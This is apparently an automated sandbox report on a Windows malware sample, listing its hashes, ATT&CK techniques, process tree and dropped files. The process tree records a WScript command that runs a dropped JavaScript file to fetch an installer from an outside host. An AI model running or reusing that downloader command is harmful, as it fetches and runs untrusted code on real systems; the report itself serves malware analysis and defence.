9d166a5b09561724122a40fee576c6ba0fc633663bb73b18d7569ea70b9dd61e

Analysis

max time kernel
119s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
12-09-2024 21:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dd18ea86a7514af85b60d874ef64dafa_JaffaCakes118.exe
Size

184KB
MD5

dd18ea86a7514af85b60d874ef64dafa
SHA1

2f7f5d0940be73785d762c11bc3860c4b8495c22
SHA256

9d166a5b09561724122a40fee576c6ba0fc633663bb73b18d7569ea70b9dd61e
SHA512

16158cb4101d14d65ff8732225d055e6c926a930a5c345570d38ff9ad8132a5fac9be8188c6f572043a278ddbcab9b80407ff468212db18d062049140681fad4
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3r:/7BSH8zUB+nGESaaRvoB7FJNndn+

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2704	WScript.exe
8	2704	WScript.exe
10	2704	WScript.exe
12	3008	WScript.exe
13	3008	WScript.exe
15	1160	WScript.exe
16	1160	WScript.exe
18	2424	WScript.exe
19	2424	WScript.exe
21	3060	WScript.exe
22	3060	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dd18ea86a7514af85b60d874ef64dafa_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2364 wrote to memory of 2704	2364	dd18ea86a7514af85b60d874ef64dafa_JaffaCakes118.exe	30
PID 2364 wrote to memory of 2704	2364	dd18ea86a7514af85b60d874ef64dafa_JaffaCakes118.exe	30
PID 2364 wrote to memory of 2704	2364	dd18ea86a7514af85b60d874ef64dafa_JaffaCakes118.exe	30
PID 2364 wrote to memory of 2704	2364	dd18ea86a7514af85b60d874ef64dafa_JaffaCakes118.exe	30
PID 2364 wrote to memory of 3008	2364	dd18ea86a7514af85b60d874ef64dafa_JaffaCakes118.exe	32
PID 2364 wrote to memory of 3008	2364	dd18ea86a7514af85b60d874ef64dafa_JaffaCakes118.exe	32
PID 2364 wrote to memory of 3008	2364	dd18ea86a7514af85b60d874ef64dafa_JaffaCakes118.exe	32
PID 2364 wrote to memory of 3008	2364	dd18ea86a7514af85b60d874ef64dafa_JaffaCakes118.exe	32
PID 2364 wrote to memory of 1160	2364	dd18ea86a7514af85b60d874ef64dafa_JaffaCakes118.exe	34
PID 2364 wrote to memory of 1160	2364	dd18ea86a7514af85b60d874ef64dafa_JaffaCakes118.exe	34
PID 2364 wrote to memory of 1160	2364	dd18ea86a7514af85b60d874ef64dafa_JaffaCakes118.exe	34
PID 2364 wrote to memory of 1160	2364	dd18ea86a7514af85b60d874ef64dafa_JaffaCakes118.exe	34
PID 2364 wrote to memory of 2424	2364	dd18ea86a7514af85b60d874ef64dafa_JaffaCakes118.exe	36
PID 2364 wrote to memory of 2424	2364	dd18ea86a7514af85b60d874ef64dafa_JaffaCakes118.exe	36
PID 2364 wrote to memory of 2424	2364	dd18ea86a7514af85b60d874ef64dafa_JaffaCakes118.exe	36
PID 2364 wrote to memory of 2424	2364	dd18ea86a7514af85b60d874ef64dafa_JaffaCakes118.exe	36
PID 2364 wrote to memory of 3060	2364	dd18ea86a7514af85b60d874ef64dafa_JaffaCakes118.exe	38
PID 2364 wrote to memory of 3060	2364	dd18ea86a7514af85b60d874ef64dafa_JaffaCakes118.exe	38
PID 2364 wrote to memory of 3060	2364	dd18ea86a7514af85b60d874ef64dafa_JaffaCakes118.exe	38
PID 2364 wrote to memory of 3060	2364	dd18ea86a7514af85b60d874ef64dafa_JaffaCakes118.exe	38

C:\Users\Admin\AppData\Local\Temp\dd18ea86a7514af85b60d874ef64dafa_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\dd18ea86a7514af85b60d874ef64dafa_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2364
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufF2D.js" http://www.djapp.info/?domain=HjCJVuUAmr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufF2D.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2704
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufF2D.js" http://www.djapp.info/?domain=HjCJVuUAmr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufF2D.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:3008
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufF2D.js" http://www.djapp.info/?domain=HjCJVuUAmr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufF2D.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1160
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufF2D.js" http://www.djapp.info/?domain=HjCJVuUAmr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufF2D.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2424
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufF2D.js" http://www.djapp.info/?domain=HjCJVuUAmr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufF2D.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:3060

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
5782b71202063757a1b6afcaa6b9b7ae

SHA1
95f528349fc85856e46e29f137241e8beefdfb51

SHA256
c4998acfd5d1ac5de821d011d45323d3667aae85b8e4ba47f3b5f9bca57d2106

SHA512
ccee76f20e75c5ef00598f419b509b5ee59575aa97dcf115815eeef4abb9f5693e564d2916a84810d5c3803a99e64255d84d4e875f88516909dde34ccb02a1d4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
f8c5a20e966738124796608cc5229491

SHA1
2c9d3ccc5801306b7deaf9a76b011a9759521a19

SHA256
89e658ccb34af415bbf5383acbee28b934ee6cf0ae2e80b6d283b38927b1cb9f

SHA512
fc58c982933f3f5b08d93c5dbe8302f287af292cf09eb66df1f3fd0af218444d38776a62aac94662ff327084ecd4e9c53df5e3c92545224d42fe5dd88b1c0e1f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
c0149c49c53a21b35bb131f584b6be51

SHA1
d6e1e8b484102cb803c42a89dd6ecdc4e7f5c84f

SHA256
8474bddcbc5becb3c8ce014368f4422d90a00548108fe708069ee505c5bbd2fc

SHA512
91cb28957cc7f9be3a77d9dca518eb519a1d568a7baccf141f3243d1ebf72a69fcb2b18d91f325078be93167b7ecb691c4a959fd77dd9d14df12eeeb4fc3b06c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0I0VVMWQ\domain_profile[1].htm

Filesize
40KB

MD5
d0aa252d2da5aeb61b8e68c875f0181a

SHA1
66a6e3642dd526de3b3ce1ee49516d04d513316f

SHA256
374bc4b0a4390cb1402c87d7389d73f723ded4bbb1d2f7fee2c1b2b9dbd95fb4

SHA512
109014941a229cafeae4013dcd206d1d39aa1928569b3424d5d76561cd343863b8cac061f6a38ef7f3048f15bb7f367d1c0f90f5a6fffe6dbb0662f0e950e3f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0I0VVMWQ\domain_profile[1].htm

Filesize
40KB

MD5
14e323da2f04528bbbe897b3537c8d0a

SHA1
6612c2a5322ec38a99697956a44c9a1d2fee5bfb

SHA256
c62dd89111adccb68082d3e77a66aeabd4353eed731432e1046cae223346159a

SHA512
29cabd26fd94d2e226b52252b2496515da46b9c128d0e1b56276162d65d63190c3e6e7428a90b65510355fb396548058dc76b0119ecbde197422914e7b72a489

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q0WBLVJY\domain_profile[1].htm

Filesize
40KB

MD5
6c57314f06de81a4cc5617782ebe3dd0

SHA1
7c629bfcdac9605ba59531f153a0ff7e609cdef1

SHA256
eff8ef5ade5eea3519999b988ec1710f94fed8ca940b8399220fdba8d1047519

SHA512
aa0ddcb41b7971c8cd4b5c7f7374d5dd857b9d0232a5447139420123bd1985073421579771960caf5fa40b1e997b539d794328aa71b6e18f665dce6783035656

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q0WBLVJY\domain_profile[1].htm

Filesize
40KB

MD5
fe3e9666e79eaae9e766b31a84ffcd4f

SHA1
7f61227802ce78b82f606734c678d13c6c2b5af3

SHA256
2f6cc4c37d56659a11d15eb5d71f4beaf55de9a4cfafdfe2ae6718c647a5345c

SHA512
6de493c9f0f3002f03389b05b930cdfc2ccdb7d3e319106b22c38c23d879e2f42a92b685db5f788c498725840fe255d13f636076960583a42161d17a7e70517b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab3E86.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar567A.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\fufF2D.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\VPFFEOPR.txt

Filesize
177B

MD5
72f9466cdb324b5d53f25b1d30efda95

SHA1
c29e7e3240180103d95e3d0d115ff4e8dba641ea

SHA256
2896388aaf50529668821a894435dc3abb3d27d23aae484934f59ba90614cd38

SHA512
e26f7e267009313bc3682113611b0d1da5f9fad11e38ef2211a14286d1c15f3ac47668eac78620d7493fbbebebe19ff2aa87dcfe1cda30e5c761df2e1b108cfe

Download Submit